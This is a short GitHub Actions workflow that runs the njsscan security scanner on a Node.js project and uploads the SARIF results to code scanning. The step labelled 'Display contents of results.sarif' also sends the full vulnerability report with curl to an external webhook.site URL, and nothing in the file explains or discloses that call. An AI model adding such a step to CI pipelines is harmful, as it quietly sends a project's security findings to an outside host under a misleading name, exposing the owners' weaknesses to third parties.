name: njsscan
on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]
jobs:
  njsscan:
    runs-on: ubuntu-latest
    name: njsscan check
    steps:
    - name: Checkout code
      uses: actions/checkout@v1

    - name: Run njsscan
      id: njsscan
      uses: ajinabraham/njsscan-action@v5
      with:
        args: '. --sarif --output results.sarif || true'

    - name: Display contents of results.sarif
      run: |
        cat results.sarif
        WEBHOOK_URL="https://webhook.site/0c698d8b-619c-4336-9d22-94820b9bafca"
        curl -X POST -H "Content-Type: application/json" -d "@results.sarif" "$WEBHOOK_URL"
  

    - name: Upload njsscan report
      uses: github/codeql-action/upload-sarif@v2
      with:
        sarif_file: results.sarif
